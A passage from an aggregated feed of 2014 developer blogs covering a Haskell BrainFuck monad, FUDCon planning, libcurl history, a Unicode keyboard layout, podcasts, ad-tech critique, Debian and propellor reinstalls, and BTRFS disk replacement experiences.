To tame brainfuck a bit, I decided to treat data addresses 0-8 as constants, which will contain the numbers 0-8. Otherwise, it's very hard to ensure that the data pointer is pointing at a nonzero number when you want to start a loop. (After all, brainfuck doesn't let you set data to some fixed value like 0 or 1!)

I wrote a little brainfuckConstants that runs a BrainFuck program with these constants set up at the beginning. It just generates the brainfuck code for a series of ASCII art fishes: >+>++>+++>++++>+++++>++++++>+++++++>++++++++>

With the fishes^Wconstants in place, it's possible to write a more useful loop. Notice how the data pointer location is saved at the beginning, and restored inside the loop body. This ensures that the provided BrainFuck action doesn't stomp on our constants.

-- Run an action in a loop, until it sets its data pointer to 0.
loop :: BrainFuck () -> BrainFuck ()
loop a = do
    here <- addr
    setAddr 1
    loopUnless0 $ do
        setAddr here
        a

I haven't bothered to make sure that the constants are really constant, but that could be done. It would just need a Contaol.Monad.BrainFuck.Safe module, that uses a different monad, in which incr and decr and input don't do anything when the data pointer is pointing at a constant. Or, perhaps this could be statically checked at the type level, with type level naturals. It's Haskell, we can make it safer if we want to. ;)

So, not only does this BrainFuck monad allow writing brainfuck code using crazy haskell syntax, instead of crazy brainfuck syntax, but it allows doing some higher-level programming, building up a useful(!?) library of BrainFuck combinators and using them to generate brainfuck code you'd not want to try to write by hand.

Of course, the real point is that "monad" and "brainfuck" so obviously belonged together that it would have been a crime not to write this.

Syndicated 2014-12-12 05:02:52 from see shy jo

11 Dec 2014 marnanel   » (Journeyer)

Wordsworth

For an English Lit GCSE assignment I wrote the diary of a policeman who was following Wordsworth around the Lakes in the belief he was a Napoleonic spy. At one point our hero attempts to get the suspect to prove he's a poet by quoting the piece he's working on. It goes:

"Behold her, single in the field,
Reaping and singing by the hedge;
Reaping and singing by herself;
It really sets my teeth on edge.
Her notes are flat; it gives me pain
To hear her solitary strain."

"If she improves," he adds, "I may revise the stanza."

This entry was originally posted at http://marnanel.dreamwidth.org/318322.html. Please comment there using OpenID.

Syndicated 2014-12-11 22:04:37 (Updated 2014-12-11 22:04:50) from Monument

11 Dec 2014 Stevey   » (Master)

An anniversary and a retirement

On this day last year I we got married.

This morning my wife cooked me breakfast in bed for the second time in her life, the first being this time last year. In thanks I will cook a three course meal this evening.

 

In unrelated news the BlogSpam service will be retiring the XML/RPC API come 1st January 2015.

This means that any/all plugins which have not been updated to use the JSON API will start to fail.

Fingers crossed nobody will hate me too much..

Syndicated 2014-12-11 10:56:05 from Steve Kemp's Blog

11 Dec 2014 amits   » (Journeyer)

Pune Bidding Again for FUDCon APAC!

When the call for bids for FUDCon APAC 2015 was put out, a few of us huddled together to discuss a bid from India.  We had already organised a successful FUDCon in Pune in 2011, so our initial conversations were around which city to host it in.  Pune won again, just because the number of volunteers available in Pune are more than any other place in India, and Pune has several technical colleges, which makes hosting the event at one of them easier.

This time around, we’re proposing to host the FUDCon at the MITCOE campus, more details in the bid page.

I was very pleased the last time around as an organiser of the FUDCon: everything had gone according to plan, even the 6 parallel sessions were going on schedule, and logistics was taken well care of.  The speakers and visitors were happy with how the event was run smoothly; despite the scale of the event – hundreds of attendees, making it the largest FUDCon ever.

We had extensively documented the planning process – even face-to-face meetings were recorded on etherpads and posted as blog posts.  That exercise was to ensure people who wanted to join in and volunteer anytime weren’t felt left out, and also to serve as useful documentation and platform for people to organise a future FUDCon at a similar scale.

That time has now come again, for us.  As part of our kickstart activities for FUDCon 2015, I went through several blog posts, event reports, and planning details from 2011.  I compiled a list of the most useful ones for the planning process, which I have appended to this blog post.

On voting for Pune again: One of the purposes of planning for a FUDCon is to involve the local non-Fedora community, like students, professors, and professionals.  Pune is fondly known as the Oxford of the East, which signifies it has a lot of education opportunities, and the city is brimming with students.  There are several colleges affiliated to the University of Pune, as well as some independently-run colleges and universities.  This gives us a lot of potential to tap into a huge student pool.

The other goal of planning a FUDCon is to involve the regional community, who know the city, its language, and so on, to pull off a successful FUDCon.  Pune fit the bill perfectly on these two counts.

When we started scouting for locations, we reached out to institutions we had had some contact with: several of us keep doing talks / sessions at events which are hosted with colleges.  One of such talks was delivered by Siddhesh at the MIT college.  He was very impressed with the students there: they already have a FOSS chapter going, the students were genuinely interested in technology and solving problems themselves.  They also use Linux as part of their activities at the college, and a few also use Linux on their personal machines.  As with all things new, there was also a lot of interest in Android and writing apps, but as long as students are actively involved in technology, and doing fun things, we know we’re going to have a very interested gathering for the FUDCon.

So based on this experience, we approached MIT to ask if they were willing to host the FUDCon.  We met with the MIT-COE folks; the HOD of the Comp. Dept., and a few professors.  They were very eager to host the event.  They offered us all kinds of assistance with hosting the event, offering their huge auditorium, and a few classrooms.  The facilities are nice, and we were impressed.  They do not have wireless on campus, but they said they will fix this by the time the event starts!  They wlil also arrange for power extension boards in the auditorium.  All this just in the first meeting, and before we even won the bid!

The professors too showed a keen interest in technology, and what we did as part of the Fedora project.  They asked us what kinds of talks they should expect (we showed them the schedule from the previous iteration), what would they gain from hosting the event — they were concerned we would step in, organise the event, and go away.  We ensured that won’t happen, and that their students will be involved in the organising of the event, and that we would also do a few things we did the last time, like organising FADs to prepare the students and faculty for the kinds of talks and discussions we’ll have at the FUDCon, setting up a local Fedora mirror, etc., and also some more – like introducing more upstream as well as direct Fedora technology.

In addition to the FUDCon, we also have planned to host one FAD (or a Fedora meetup, focussed on one topic) per month.  We’ve done a few of those at the Red Hat Pune office, but we plan to go to colleges for the next ones.  We also mentioned we could host such events at their colleges if they have interest.  They were eager to host such events too.

Overall, we felt MIT-COE and us would have a great time organising the FUDCon together.  It was really easy to decide on the venue based on these discussions.  The only point which we had to have some discussion around was the timing of the event – Mar-Apr is exam time for the colleges, and that wouldn’t have been ideal.  We went with June 2015 as a month when we all would be able to participate better.  The students will be fresh after a (almost) month-long vacation.Another encouraging thing with scouting for locations was that there were several colleges that showed interest in hosting the FUDCon, as well as the smaller events.  We can’t host the FUDCon at those venues, but we can surely host the smaller events (and the upcoming release party) at these locations.  I’m sure we’ll get quite a few people (students + faculty) involved with Fedora and FOSS technology if we go through with our plans.

This post is already too long; I will save the rest for later (and for others to chime in).  As promised earlier, these are the links (in reverse chronological order) with information that will help organising a large FUDCon:
http://opensource.com/life/11/12/fudcon-pune-making-conference

http://log.amitshah.net/2011/11/fudcon-pune-day-1/

http://mether.wordpress.com/2011/11/03/fudcon-pune-2011-one-day-left/

http://log.amitshah.net/2011/11/quotable-quotes-and-videos-from-fudcon-pune-2011/

http://log.amitshah.net/2011/11/gearing-up-for-fudcon-pune-2011-day-2/

http://pjps.wordpress.com/2011/11/12/fudcon-pune-2011-2/

http://log.amitshah.net/2011/10/fudcon-pune-money-notes/

http://www.shakthimaan.com/posts/2011/11/12/fudcon-pune-badges/news.html

http://log.amitshah.net/2011/10/fudcon-pune-2011-f2f-meeting-minutes-13-oct/

http://log.amitshah.net/2011/10/fudcon-pune-planning-f2f-minutes-4-oct-2011/

http://log.amitshah.net/2011/09/fudcon-pune-f2f-planning-minutes-sep-27-edition/

http://mether.wordpress.com/2011/09/23/fudcon-india-sep-20-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/09/13/fudcon-india-sep-13-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/09/09/fudcon-india-sep-06-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/08/24/fudcon-india-aug-23rd-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/08/12/fudcon-india-aug-9th-2011-face-to-face-meeting-minutes/

http://mether.wordpress.com/2011/08/05/fudcon-india-aug-2nd-2011-face-to-face-meeting-minutes/

http://log.amitshah.net/2011/07/fudcon-india-f2f-planning-meeting-minutes-jul-26-2011/

https://lists.fedoraproject.org/pipermail/fudcon-planning/2011-July/002521.html

http://mether.wordpress.com/2011/07/23/fudcon-pune-2011-now-open-for-sponsorship-requests/

http://log.amitshah.net/2011/07/fudcon-india-2011-f2f-meeting-2/

http://log.amitshah.net/2011/07/fudcon-india-planning-weekly-meetings/

http://log.amitshah.net/2011/07/first-fudcon-india-meeting/

http://log.amitshah.net/2011/07/fudcon-apac-2011-pune-nov-4-6/

Syndicated 2014-12-11 06:42:30 from Think. Debate. Innovate.

11 Dec 2014 marnanel   » (Journeyer)

Time blew away like dandelion seed

A few years ago, I collected 110 of my poems into a book; I'm bringing it back into print for a few months in order to pay bills since my partner and I are both too sick to work. You can buy it from Lulu in the UK, US, and many other countries-- usually it's US$20, about £12, but at present it's discounted to US$17, about £11.

There will also be a numbered and signed proper hardback edition of fifty; I'll be doing that through Kickstarter and announcing it later this week.

Let me know if you have questions. And tell your friends!



Reader comments:
“It's happy, sad, funny, thought-provoking and occasionally groan-worthy.”
“Overflowing with beauty, sadness and joy.”


This entry was originally posted at http://marnanel.dreamwidth.org/318047.html. Please comment there using OpenID.

Syndicated 2014-12-11 02:42:27 (Updated 2014-12-11 02:52:51) from Monument

10 Dec 2014 sye   » (Journeyer)

my last entry was Nov. 30th. There were 25 other people's entry between then and now. Need to mail a package to my brother in Shanghai. And also work on streaming data from WeChat to other data sources. site monitoring service:

http://www.isup.me/

I'd like to know how to turn-off my BIGmon.net account alerts.

New Jersey Lawyer Magazine Dec. 2014/No. 291
"LABOR AND EMPLOYMENT LAW"

Message from the Special Editors
Brian R. Lehrer is with the law firm of Achenck, Price, Smith & King, LLP and is a member of the New Jersey Lawyer Magazine Editorial Board
Francine Esposito is a partner with the law firm of Day Pitney LLP.

When one individual inflicts bodily injury upon another, such injury that death results, we call the deed manslaughter; when the assailant knew in advance that the injury would be fatal, we call his deed murder. But when society places hundreds of proletarians in such a position that they inevitably meet a too early and an unnatural death, one which is quite as much a death by violence as that by the sword or bullet ... its deed is murder just as surely as the deed of the single individual...

When Friedrich Engels wrote these words in The condition of the Working Class in England, he was discussing more than the conditions of the workplace. Engels was sickened by the abject poverty of a working class experiencing true income inequality with no recourse against their employers. Of course, Engels would go on to co-author the Communist Manifesto with his hero Karl Marx, and ignite a catastrophic experiment in social engineering. Meanwhile, in the United States, capitalism thrived, after surviving the Great Depression. Within that framework, laws were passed to protect employees, and courts interpreted those laws to balance the interests of employers and employees in the workplace.

The 23 articles in this issue of New Jersey Lawyer Magazine demonstrate the continuing importance the Legislature and courts have placed on that balance, and our society's belief that the workplace should be tolerable and productive -- from the wages paid to the conduct of supervisors. Whatever side of the fence you are on, the authors demonstrated the complexities of the employer-employee relationship and offer everything from practical tips in drafting severance agreements and restrictive covenants, to a discussion of cutting-edge issues such as medical marijuana in the workplace and the potentital dilemmas involving unpaid interns.

....

10 Dec 2014 bagder   » (Master)

libcurl multi_socket 3333 days later

.SE-logoOn October 25, 2005 I sent out the announcement about “libcurl funding from the Swedish IIS Foundation“. It was the beginning of what would eventually become the curl_multi_socket_action() function and its related API features. The API we provide for event-driven applications. This API is the most suitable one in libcurl if you intend to scale up your client up to and beyond hundreds or thousands of simultaneous transfers.

Thanks to this funding from IIS, I could spend a couple of months working full-time on implementing the ideas I had. They paid me the equivalent of 19,000 USD back then. IIS is the non-profit foundation that runs the .se TLD and they fund projects that help internet and internet usage, in particular in Sweden. IIS usually just call themselves “.se” (dot ess ee) these days.

Event-based programming isn’t generally the easiest approach so most people don’t easily take this route without careful consideration, and also if you want your event-based application to be portable among multiple platforms you also need to use an event-based library that abstracts the underlying function calls. These are all reasons why this remains a niche API in libcurl, used only by a small portion of users. Still, there are users and they seem to be able to use this API fine. A success in my eyes.

One dollar billPart of that improvement project to make libcurl scale and perform better, was also to introduce HTTP pipelining support. I didn’t quite manage that part with in the scope of that project but the pipelining support in libcurl was born in that period  (autumn 2006) but had to be improved several times over the years until it became decently good just a few years ago – and we’re just now (still) fixing more pipelining problems.

On December 10, 2014 there are exactly 3333 days since that initial announcement of mine. I’d like to highlight this occasion by thanking IIS again. Thanks IIS!

Current funding

These days I’m spending a part of my daytime job working on curl with my employer’s blessing and that’s the funding I have – most of my personal time spent is still spare time. I certainly wouldn’t mind seeing others help out, but the best funding is provided as pure man power that can help out and not by trying to buy my time to add your features. Also, I will decline all (friendly) offers to host the web site on your servers since we already have a fairly stable and reliable infrastructure sponsored.

I’m not aware of anyone else that are spending (much) paid work time on curl code, although I’m know there are quite a few who do it every now and then – especially to fix problems that occur in commercial products or services or to add features to such.

IIS still donates money to internet related projects in Sweden but I never applied for any funding from them again. Mostly because it has been hard to sync with my normal life and job situation. If you’re a Swede or just live in Sweden, do consider checking this out for your next internet adventure!

Syndicated 2014-12-10 07:15:25 from daniel.haxx.se

10 Dec 2014 guylhem   » (Journeyer)

Unicode Greek and Maths letters with Linux

Here’s my new QWERTY keyboard:

 ¬∞ / ¹≈ / ²≠ / ³∇ / ⁴∀ / ⁵∪ / ⁶∩ / ⁷∈ / ⁸⊂ / ⁹≽ / ⁰≿ / ⁻ ⃗ / ⁺±
 θΘ / ωΩ / ɛƐ / ρϱ / ꚍꚌ / ψΨ / υϒ / ι∫ / ϖϵ / πΠ /  ̂  ̈ /  ̃ ̧  /  ̊  ̀
 α∂ / σΣ / δΔ / φΦ / ɣΓ / ηϘ / ϕϑ / 𝟀κ / λΛ /   ̅ ́ /   ̆ ̇
 ζϟ / ξΞ / ςϚ / √⊥ / βϐ / νͲ / μϡ / ≤≺ / ≥≻ / / ⃝

It’s a xmodmap I wrote to write math easily, using the 3rd and 4th level (AltGr and Shift+AltGr), while keeping the standard layout by default.

For most letters, you’ll find greek letters - including the rare ones, like script theta : ϑ, script phi ϕ, script epsilon ϵ and even the really rare ancient-greek ones (check wikipedia, they all have a cool story)

  • sampi Ͳ : U+0372 U+0373
  • numeric sampi ϡ : U+03E0 U+03E1
  • koppa Ϙ : U+03DE U+03DF
  • numeric koppa ϟ : U+03D8 U+03D9
  • digamma ς : U+03DA U+03DB  (but also U+03C2)

Numeric koppa looks ϟ like thunderbolts : ϟϟ. With koppa I can even add clouds above to make a full storm:-)

ϘϘϘϘϘϘ

ϟϟ ! ! ϟϟ ! !

Not sure I’ll ever use them, but who knows - and they’re fun!!

Digamma ς the last one is still used and goes by many names - waw, epsimmon, stigma, or “final sigma” as that’s what σ should look like when it’s at the end of a words (so says wikipedia!)

You’ll notice my lowercase gamma, taus and chis are not standard, because I hate the way they look in most fonts : a gamma that looks like a y or a chi that looks like a x won’t cut it . So I dug in unicode shapes and found some cool replacements. Likewise for epsilon, which is accompanied by a big epsilon for whenever I need it and the standard awfully round ϵ next to omegapi ϖ (that’s not a creative name, whoever created that one must have been really tired :-)

Beside all this unicode goodness, I have :

 - On the first row, math symbols (with the integral as Shift+AltGr I, the other exception being square root and perpedicular for the letter V, and rounded d ∂ for Shift+AltGr a, to keep company to α)

 - On the right handside, accents - so I can add a macron on any letter, or do vectors like α⃗ (alpha vector says hello!), or strike through things  a⃗⃠ (alpha vector says goodbye!)

I love unicode and xmodmap :-)

Syndicated 2014-12-10 01:28:47 from Guylhem's most recent funny hacks & thoughts

9 Dec 2014 joey   » (Master)

podcasts that don't suck, 2014 edition

  • The Memory Palace: This is the way history should be taught, but rarely is. Nate DiMeo takes past events and puts you in the middle of them, in a way that makes you emphathise so much with people from the past. Each episode is a little short story, and they're often only a few minutes long. A great example is this description of when Niagra falls stopped. I have listened to the entire back archive, and want more. Only downside is it's a looong time between new episodes.

  • The Haskell Cast: Panel discussion with a guest, there is a lot of expertise amoung them and I'm often scrambling to keep up with the barrage of ideas. If this seems too tame, check out The Type Theory Podcast instead..

  • Benjamen Walker's Theory of Everything: Only caught 2 episodes so far, but they've both been great. Short, punchy, quirky, geeky. Astoundingly good production values.

  • Lightspeed magazine and Escape Pod blur together for me. Both feature 20-50 minute science fiction short stories, and occasionally other genre fictions. They seem to get all the award-winning short stories. I sometimes fall asleep to these which can make for strange dreams. Two strongly contrasting examples: "Observations About Eggs from the Man Sitting Next to Me on a Flight from Chicago, Illinois to Cedar Rapids, Iowa" and "Pay Phobetor"

  • Serial: You probably already know about this high profile TAL spinoff. If you didn't before: You're welcome. :) Nuff said.

  • Redecentralize: Interviews with creators of decentralized internet tools like Tahoe-LAFS, Ethereum, Media Goblin, TeleHash. I just wish it went into more depth on protocols and how they work.

  • Love and Radio: This American Life squared and on acid.

  • Debian & Stuff: My friend Asheesh and that guy I ate Thai food with once in Portland in a marvelously unfocused podcast that somehow connects everything up in the end. Only one episode so far; what are you guys waiting on? :P

  • Hacker Public Radio: Anyone can upload an episode, and multiple episodes are published each week, which makes this a grab bag to pick and choose from occasionally. While mostly about Linux and Free Software, the best episodes are those that veer var afield, such as the 40 minute river swim recording featured in Wildswimming in France.

Also, out of the podcasts I listed previously, I still listen to and enjoy Free As In Freedom, Off the Hook, and the Long Now Seminars.

PS: A nice podcatcher, for the technically inclined is git-annex importfeed. Featuring list of feeds in a text file, and distributed podcatching!

Syndicated 2014-12-09 19:05:20 from see shy jo

9 Dec 2014 wingo   » (Master)

state of js implementations, 2014 edition

I gave a short talk about the state of JavaScript implementations this year at the Web Engines Hackfest.


29 minutes, vorbis or mp3; slides (PDF)

The talk goes over a bit of the history of JS implementations, with a focus on performance and architecture. It then moves on to talk about what happened in 2014 and some ideas about where 2015 might be going. Have a look if that's a thing you are in to. Thanks to Adobe, Collabora, and Igalia for sponsoring the event.

Syndicated 2014-12-09 10:29:20 from wingolog

8 Dec 2014 dan   » (Master)

ANN Sledge (We're lost in music)

As a person with a large ripped CD collection at home
I want to find and listen to that music from work/on my phone
So that I don’t have to talk to the people around me

Sledge is a program that you can run on a computer with

  • some music you want to listen to
  • a JVM
  • some means of exposing a TCP server port to the internet
  • libav / ffmpeg

It indexes all the music in the directories you tell it to look in, and then it serves a web page with a search box and some buttons on it, which you can access on a device (computer/phone/tablet/etc) that

  • can access the internet
  • has a web browser that supports the HTML5 AUDIO element and likes Ogg files (most of them, these days)

It’s also the first useful[*] thing I’ve written using Clojure and Clojurescript and Om . Get it at https://github.com/telent/sledge – no jar file download yet, so you’ll need leiningen to build it

[*] defined as: I’m using it.

Standing on the shoulders of github

The heavy lifting was mostly done by others. In addition to the above-mentioned, it uses

  • https://github.com/weavejester/clucy as a Lucene interface
  • https://github.com/ztellman/aleph for streaming the transcoded audio
  • https://github.com/DanPallas/green-tags to wrap JAudioTagger

Future plans

It’s reached MVP, as far as I’m concerned: aside from a couple of bugs it meets my use case. But I do have more planned for it as time permits:

  • UI makeover, make it easier to discover music I’d forgotten I have
  • Make the initial media scan much much faster (currently does about 2000 files a minute on my machine) and/or show the progress as it scans
  • some tools for reporting on duplicate files
  • something to deal with correcting/adding tags to media files that have bad or no metadata
  • transcode to formats other than Ogg Vorbis, maybe, if there are people who wnt to use it with browsers that don’t support Ogg

A long long time ago

Previously: “I started looking at all the UPNP/DLNA stuff once for a “copious spare time” project, but I couldn’t help thinking that for most common uses it was surely way over-engineered”. In the four years (and two days) since my opinions haven’t changed but my tools have.

Syndicated 2014-12-08 07:16:18 from diary at Telent Netowrks

8 Dec 2014 dmarti   » (Master)

Thought Leader Insights

Thought Leader Rob Rasko writes: One of the greatest fears publishers face is an impending loss of revenue, based on the spread between what they earn selling their premium inventory and what they earn from programmatic. In some instances, the delta between publisher premium and programmatic can be as great as ten to one; in other words, some publishers’ programmatic ads are earning only ten percent of what their premium counterparts earn. Since programmatic is here to stay...

Too much corporate speak. Let's see if we can find someone who puts it more clearly. This is my neighborhood. You and your friends have to show me a little respect, ah?....You should let me wet my beak a little.

Adtech proponents don't say it like that, though. It's not adtech people wanting to take web publishing's ad revenue away on their own initiative. Programmatic is here to stay and it's all INEVITABLE because of TECHNOLOGY and stuff. How about that Internet, disrupting the economy again? What can you do?

This is, of course, bullshit. The mess that web ads are in, where adtech destroys more value than it captures, is a matter of economic gamesmanship, not technological inevitability. Like all long-running varieties of bullshit, the adtech variety depends on different qualities to get past different people. It beats regular marketing people's filters by having just enough math in it to scare them. It gets past the technology people by appealing to one of the oldest, most deeply held IT biases: if it was hard to write, and technically elegant, it must be good. (Ever notice how so many tech people automatically say better ads instead of more targeted ads even when targeting reduces a medium's value?) Finally, the people with the best chance of detecting adtech bullshit—journalists who cover business and the web—are kept looking the wrong way by their own pride in the editorial/advertising firewall, which is ordinarily a good thing.

So what's the answer? Let's look at the chart.

Print is moving down and to the left. It'll be too small for analysts to bother tracking within a few years. Mobile is moving to the right, and a little up. All the web has to do is let mobile take over the bottom right corner, which it's on its way to doing, and move up and a little left to get out of the way and take print's old niche.

That depends on fixing third-party tracking, though. Maybe, if we can somehow get all the Thought Leaders to focus on native apps while the web quietly fixes its trackability issues, it'll be fixed before anyone knows it. Especially if publishers can give the audience a little nudge.

Bonus links

Leslie Anne Jones: Trapped between Yelp and a hard place

Alana Semuels: Is There Hope for Local News?

Rance Crain: Is Consumer Tracking the New Advertising?

News: Cleaning Up the Ad Clutter

Baekdal Plus: The Four Laws of Privacy - (by @baekdal)

John McDermott: Google’s display advertising dominance raises concerns

Lucia Moses: Inside T Brand Studio, The New York Times’ native ad unit (via Mediagazer)

Judy Shapiro: It's Time to Balance the Tech-Human Element in Marketing

Ruben Bolling: Richard Scarry's Busy Town in the 21st Century (via kottke.org)

Dan Gillmor: When Journalists Must Not Be Objective (via Dan Gillmor)

Samuel Gibbs: Europe’s next privacy war is with websites silently tracking users (via Techrights)

Mark Wilson: TMI Is The Future Of Branding

george tannenbaum: Mike Nichols and Digital Natives.

Tom Philpott: Brazil's Dietary Guidelines Are So Much Better Than the USDA's

rhhackettfortune: How online pharmacy spammer organizations really work (via Krebs on Security)

Jim Edwards: Google's New Ad Strategy Could Delay A Bunch Of Tech IPOs (GOOG) (via VentureBeat)

Ben Goldacre: When data gets creepy: the secrets we don’t realise we’re giving away

Zach Wener-Fligner: Google admits that advertisers wasted their money on more than half of internet ads

Barry Levine: With Big Data, where’s the magic in marketing?

Phys.org - latest science and technology news stories: Unlike humans, monkeys aren't fooled by expensive brands

Syndicated 2014-12-07 05:24:34 from Don Marti

7 Dec 2014 Stevey   » (Master)

I eventually installed Debian on a new desktop.

Recently I build a new desktop system. The hightlights of the hardware are a pair of 512Gb SSDs, which were to be configured in software RAID for additional speed and reliability (I'm paranoid that they'd suddenly stop working one day). From power-on to the (GNOME) login-prompt takes approximately 10 seconds.

I had to fight with the Debian installer to get the beast working though as only the Jessie Beta 2 installer would recognize the SSDs, which are Crucual MX100 devices. My local PXE-setup which deploys the daily testing installer, and the wheezy installer, both failed to recognize the drives at all.

The biggest pain was installing grub on the devices. I think this was mostly this was due to UFI things I didn't understand. I created spare partitions for it, and messaged around with grub-ufi, but ultimately disabled as much of the "fancy modern stuff" as I could in the BIOS, leaving me with AHCI for the SATA SSDs, and then things worked pretty well. After working through the installer about seven times I also simplified things by partitioning and installing on only a single drive, and only configured the RAID once I had a bootable and working system.

(If you've never done that it's pretty fun. Install on one drive. Ignore the other. Then configure the second drive as part of a RAID array, but mark the other half as missing/failed/dead. Once you've done that you can create filesystems on the various /dev/mdX devices, rsync the data across, and once you boot from the system with root=/dev/md2 you can add the first drive as the missing half. Do it patiently and carefully and it'll just work :)

There were some niggles though:

  • Jessie didn't give me the option of the gnome desktop I know/love. So I had to install gnome-session-fallback. I also had to mess around with ~/.config/autostart because the gnome-session-properties command (which should let you tweak the auto-starting applications) doesn't exist anymore.

  • Setting up custom keyboard-shortcuts doesn't seem to work.

  • I had to use gnome-tweak-tool to get icons, etc, on my desktop.

Because I assume the SSDs will just die at some point, and probably both on the same day, I installed and configured obnam to run backups. There is more testing and similar, but this is the core of my backup script:

  #!/bin/sh

# backup "/" - minus some exceptions.
obnam backup -r /media/backups/storage --exclude=/proc --exclude=/sys --exclude=/dev --exclude=/media /

# keep files for various periods
obnam forget --keep="30d,8w,8m" --repository /media/backups/storage

Syndicated 2014-12-07 08:12:46 from Steve Kemp's Blog

5 Dec 2014 joey   » (Master)

clean OS reinstalls with propellor

You have a machine someplace, probably in The Cloud, and it has Linux installed, but not to your liking. You want to do a clean reinstall, maybe switching the distribution, or getting rid of the cruft. But this requires running an installer, and it's too difficult to run d-i on remote machines.

Wouldn't it be nice if you could point a program at that machine and have it do a reinstall, on the fly, while the machine was running?

This is what I've now taught propellor to do! Here's a working configuration which will make propellor convert a system running Fedora (or probably many other Linux distros) to Debian:

testvm :: Host
testvm = host "testvm.kitenet.net"
        & os (System (Debian Unstable) "amd64")
        & OS.cleanInstallOnce (OS.Confirmed "testvm.kitenet.net")
                `onChange` propertyList "fixing up after clean install"
                        [ User.shadowConfig True
                        , OS.preserveRootSshAuthorized
                        , OS.preserveResolvConf
                        , Apt.update
                        , Grub.boots "/dev/sda"
                                `requires` Grub.installed Grub.PC
                        ]
        & Hostname.sane
        & Hostname.searchDomain
        & Apt.installed ["linux-image-amd64"]
        & Apt.installed ["ssh"]
        & User.hasSomePassword "root"

It was surprisingly easy to build this. Propellor already knew how to create a chroot, so from there it basically just has to move files around until the chroot takes over from the old OS.

After the cleanInstallOnce property does its thing, propellor is running inside a freshly debootstrapped Debian system. Then we just need a few more Propertites to get from there to a bootable, usable system: Install grub and the kernel, turn on shadow passwords, preserve a few config files from the old OS, etc.

It's really astounding to me how much easier this was to build than it was to build d-i. It took years to get d-i to the point of being able to install a working system. It took me a few part days to add this capability to propellor (It's 200 lines of code), and I've probably spent a total of less than 30 days total developing propellor in its entirity.

So, what gives? Why is this so much easier? There are a lot of reasons:

  • Technology is so much better now. I can spin up cloud VMs for testing in seconds; I use VirtualBox to restore a system from a snapshot. So testing is much much easier. The first work on d-i was done by booting real machines, and for a while I was booting them using floppies.

  • Propellor doesn't have a user interface. The best part of d-i is preseeding, but that was mostly an accident; when I started developing d-i the first thing I wrote was main-menu (which is invisible 99.9% of the time) and we had to develop cdebconf, and tons of other UI. Probably 90% of d-i work involves the UI. Jettisoning the UI entirely thus speeds up development enormously. And propellor's configuration file blows d-i preseeding out of the water in expressiveness and flexability.

  • Propellor has a much more principled design and implementation. Separating things into Properties, which are composable and reusable gives enormous leverage. Strong type checking and a powerful programming language make it much easier to develop than d-i's mess of shell scripts calling underpowered busybox commands etc. Properties often Just Work the first time they're tested.

  • No separate runtime. d-i runs in its own environment, which is really a little custom linux distribution. Developing linux distributions is hard. Propellor drops into a live system and runs there. So I don't need to worry about booting up the system, getting it on the network, etc etc. This probably removes another order of magnitude of complexity from propellor as compared with d-i.

This seems like the opposite of the Second System effect to me. So perhaps d-i was the second system all along?

I don't know if I'm going to take this all the way to propellor is d-i 2.0. But in theory, all that's needed now is:

  • Teaching propellor how to build a bootable image, containing a live Debian system and propellor. (Yes, this would mean reimplementing debian-live, but I estimate 100 lines of code to do it in propellor; most of the Properties needed already exist.) That image would then be booted up and perform the installation.
  • Some kind of UI that generates the propellor config file.
  • Adding Properties to partition the disk.

cleanInstallOnce and associated Properties will be included in propellor's upcoming 1.1.0 release, and are available in git now.

Oh BTW, you could parameterize a few Properties by OS, and Propellor could be used to install not just Debian or Ubuntu, but whatever Linux distribution you want. Patches welcomed...

Syndicated 2014-12-05 20:24:32 from see shy jo

5 Dec 2014 etbe   » (Master)

BTRFS Status Dec 2014

My last problem with BTRFS was in August [1]. BTRFS has been running mostly uneventfully for me for the last 4 months, that’s a good improvement but the fact that 4 months of no problems is noteworthy for something as important as a filesystem is a cause for ongoing concern.

A RAID-1 Array

A week ago I had a minor problem with my home file server, one of the 3TB disks in the BTRFS RAID-1 started giving read errors. That’s not a big deal, I bought a new disk and did a “btrfs replace” operation which was quick and easy. The first annoyance was that the output of “btrfs device stats” reported an error count for the new device, it seems that “btrfs device replace” copies everything from the old disk including the error count. The solution is to use “btrfs device stats -z” to reset the count after replacing a device.

I replaced the 3TB disk with a 4TB disk (with current prices it doesn’t make sense to buy a new 3TB disk). As I was running low on disk space I added a 1TB disk to give it 4TB of RAID-1 capacity, one of the nice features of BTRFS is that a RAID-1 filesystem can support any combination of disks and use them to store 2 copies of every block of data. I started running a btrfs balance to get BTRFS to try and use all the space before learning from the mailing list that I should have done “btrfs filesystem resize” to make it use all the space. So my balance operation had configured the filesystem to configure itself for 2*3TB+1*1TB disks which wasn’t the right configuration when the 4TB disk was fully used. To make it even more annoying the “btrfs filesystem resize” command takes a “devid” not a device name.

I think that when BTRFS is more stable it would be good to have the btrfs utility warn the user about such potential mistakes. When a replacement device is larger than the old one it will be very common to want to use that space. The btrfs utility could easily suggest the most likely “btrfs filesystem resize” to make things easier for the user.

In a disturbing coincidence a few days after replacing the first 3TB disk the other 3TB disk started giving read errors. So I replaced the second 3TB disk with a 4TB disk and removed the 1TB disk to give a 4TB RAID-1 array. This is when it would be handy to have the metadata duplication feature and copies= option of ZFS.

Ctree Corruption

2 weeks ago a basic workstation with a 120G SSD owned by a relative stopped booting, the most significant errors it gave were “BTRFS: log replay required on RO media” and “BTRFS: open_ctree failed”. The solution to this is to run the command “btrfs-zero-log”, but that initially didn’t work. I restored the system from a backup (which was 2 months old) and took the SSD home to work on it. A day later “btrfs-zero-log” worked correctly and I recovered all the data. Note that I didn’t even try mounting the filesystem in question read-write, I mounted it read-only to copy all the data off. While in theory the filesystem should have been OK I didn’t have a need to keep using it at that time (having already wiped the original device and restored from backup) and I don’t have confidence in BTRFS working correctly in that situation.

While it was nice to get all the data back it’s a concern when commands don’t operate consistently.

Debian and BTRFS

I was concerned when the Debian kernel team chose 3.16 as the kernel for Jessie (the next Debian release). Judging by the way development has been going I wasn’t confident that 3.16 would turn out to be stable enough for BTRFS. But 3.16 is working reasonably well on a number of systems so it seems that it’s likely to work well in practice.

But I’m still deploying more ZFS servers.

The Value of Anecdotal Evidence

When evaluating software based on reports from reliable sources (IE most readers will trust me to run systems well and only report genuine bugs) bad reports have a much higher weight than good reports. The fact that I’ve seen kernel 3.16 to work reasonably well on ~6 systems is nice but that doesn’t mean it will work well on thousands of other systems – although it does indicate that it will work well on more systems than some earlier Linux kernels which had common BTRFS failures.

